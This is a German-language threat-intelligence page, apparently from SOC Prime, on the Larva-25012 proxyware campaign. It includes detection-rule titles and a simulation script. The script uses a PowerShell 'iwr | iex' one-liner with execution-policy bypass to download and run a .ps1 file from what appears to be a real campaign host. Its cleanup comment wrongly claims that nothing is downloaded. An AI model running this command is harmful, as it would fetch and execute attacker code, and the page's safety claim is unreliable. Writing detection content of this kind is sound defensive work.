SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: Eine Proxyware-Vertriebskampagne 2026

Author Photo
SOC Prime Team linkedin icon Folgen
Larva-25012: Eine Proxyware-Vertriebskampagne 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bedrohungsakteur Larva-25012 verteilt aktiv Proxyware, um kompromittierte Systeme zu monetarisieren, indem er die Internet-Bandbreite der Benutzer kapert. Die Kampagne baut auf bestehenden DPLoader-Infektionen auf und nutzt mehrere Distributionskanäle, darunter YouTube-Download-Websites und GitHub. Die Malware setzt mehrere Proxyware-Familien ein, darunter DigitalPulse, SOAX, Appsalt und IPRoyal.

Untersuchung

Das AhnLab Security Intelligence Center (ASEC) verfolgte anhaltende Proxyjacking-Aktivitäten und identifizierte erneuerte Operationen von Larva-25012 in der zweiten Hälfte des Jahres 2026. Die Untersuchung ergab, dass Angreifer sowohl JavaScript- als auch Python-Varianten von DPLoader verwenden, um Persistenz aufrechtzuerhalten und PowerShell-Befehle auszuführen. Geplante Aufgaben werden ebenfalls erstellt, um sicherzustellen, dass die bösartigen Skripte auf kompromittierten Systemen weiterhin ausgeführt werden.

Schadensbegrenzung

Benutzer sollten es vermeiden, ausführbare Dateien von verdächtigen Websites, Pop-up-Anzeigen oder inoffiziellen File-Sharing-Plattformen herunterzuladen. Software sollte nur von vertrauenswürdigen und legitimen Quellen bezogen werden, während geknackte Anwendungen und illegale Download-Websites vermieden werden sollten. Organisationen sollten auch sicherstellen, dass Endpoint-Schutzlösungen, einschließlich V3, vollständig aktualisiert sind.

Reaktion

Wenn verdächtige Aktivitäten erkannt werden, sollten Administratoren schädliche PowerShell-Prozesse und geplante Aufgaben, die den betroffenen Proxyware-Familien zugeordnet sind, identifizieren und beenden. Systeme sollten auch auf DPLoader überprüft werden, der als Schlüsselkomponente für Infektion und Persistenz dient. Überprüfen Sie ausgehenden Netzwerkverkehr auf unautorisierte Verbindungen zu bekannten oder verdächtigen C2-Infrastrukturen.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Download oder Upload via Powershell (über cmdline)

SOC Prime Team
22 Sep 2026

Verdächtige NodeJS-Kindprozesse [Windows] (über cmdline)

SOC Prime Team
22 Sep 2026

Deaktivierung der Windows Defender-Echtzeitüberwachung und andere Voreinstellungsänderungen (über cmdline)

SOC Prime Team
22 Sep 2026

Aufruf verdächtiger .NET-Methoden von Powershell (über powershell)

SOC Prime Team
22 Sep 2026

Möglicher Missbrauch von Cloudflare-Entwicklungsdomains (über dns)

SOC Prime Team
22 Sep 2026

IOCs (HashMd5) zur Erkennung: Larva-25012: Eine Proxyware-Verteilungskampagne 2026

SOC Prime AI-Regeln
22 Sep 2026

Erkennung von PowerShell Proxyware-Installationsskripten [Windows Powershell]

SOC Prime AI-Regeln
22 Sep 2026

Simulation Execution

  • Angriffserzählung & Befehle: Ein Angreifer, der versucht, Proxyware für die unautorisierte Bandbreitennutzung (Larva-25012) zu installieren, führt eine PowerShell-Einzeiler aus. Ziel ist es, das lokale Dateiscanning zu umgehen, indem die Nutzlast direkt in den Speicher geladen wird. Sie verwenden den -ExecutionPolicy Bypass Parameter, um sicherzustellen, dass das Skript ausgeführt wird, und iwr um die Datei von einer Cloudfront-Verteilung abzurufen, wobei sie zu iex geleitet wird, um sofort ausgeführt zu werden. Diese spezifische Befehlszeile ist eines der Zielsignaturen in der Erkennungsregel.

  • Regressionstestskript:

    # Simulation der Larva-25012 Proxyware-Installation
    # Dieser Befehl ist speziell so ausgelegt, dass er mit selection2 in der Erkennungsregel übereinstimmt.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Wir verwenden Start-Process, um sicherzustellen, dass die Befehlszeile als neues Prozessevent erfasst wird
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Säuberungsbefehle:

    # Es werden keine Dateien tatsächlich heruntergeladen aufgrund der Natur der 'iex'-Pipe in der Simulation,
    # aber wenn irgendwelche Artefakte erstellt worden wären, würden sie hier entfernt werden.
    Write-Host "Simulation Cleanup abgeschlossen. Keine persistente Artefakte erstellt."